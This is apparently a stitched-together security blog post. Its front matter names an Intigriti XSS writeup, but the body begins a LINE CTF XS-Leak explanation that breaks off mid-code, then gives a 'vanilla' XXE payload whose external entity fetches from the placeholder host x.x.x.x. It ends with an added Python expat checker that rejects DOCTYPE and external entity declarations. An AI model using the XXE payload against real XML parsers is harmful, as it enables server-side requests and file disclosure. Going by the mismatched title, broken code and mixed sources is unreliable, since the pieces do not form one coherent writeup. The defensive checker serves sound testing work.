| layout | title | subtitle | cover-img | thumbnail-img | share-img | tags |
|---|---|---|---|---|---|---|
| post | Intigriti's Nov XSS Challenge Writeup | XSS | /assets/img/wsc.jpg | /assets/img/wsc.jpg | /assets/img/wsc.jpg | |
XS-Leak via download behavior in headless Chrome.
The application has a note search feature with a download option, so visiting http://34.84.72.167/search?q=LINECTF{&download downloads a JSON file if the value of the q parameter exists in the notes.
Downloads do not work in headless Chrome, so it throws an error.
page.goto(url).then(() => {
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
```
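To confirm that an XML entry point refuses the vanilla payload above, the following added example (not part of the original page) runs it through Python's standard-library expat bindings with handlers that abort on a DOCTYPE or an external entity declaration, so nothing is ever fetched. The helper name `xml_rejection_reason`, the `allow_doctype` switch and the benign sample are assumptions made for illustration.

```python
import xml.parsers.expat as expat

# The "vanilla" payload from the page; x.x.x.x is the page's own placeholder host.
PAGE_PAYLOAD = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>"""

# Constructed benign document for comparison.
BENIGN = b'<?xml version="1.0" ?><r>hello</r>'


class ForbiddenXML(ValueError):
    """Raised from an expat handler to abort parsing immediately."""


def xml_rejection_reason(data, allow_doctype=False):
    """Return why `data` must be rejected, or None if it is acceptable.

    Hypothetical helper: expat only reports declarations, it never resolves them.
    """
    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Strict mode: most services never need a DTD, so refuse it outright.
        if not allow_doctype:
            raise ForbiddenXML(f"DOCTYPE declared for root element {name!r}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # A SYSTEM or PUBLIC identifier marks an external entity.
        if sysid is not None or pubid is not None:
            raise ForbiddenXML(f"external entity {name!r} -> {sysid}")

    def on_external_ref(context, base, sysid, pubid):
        # Backstop for references that reach the body undeclared in this scan.
        raise ForbiddenXML(f"external entity reference -> {sysid}")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except ForbiddenXML as exc:
        return str(exc)
    except expat.ExpatError as exc:
        return f"not well-formed: {exc}"
    return None
```

Calling the helper before handing input to the application's real parser gives a pre-parse gate; with `allow_doctype=True` it still stops at the `sp` entity declaration.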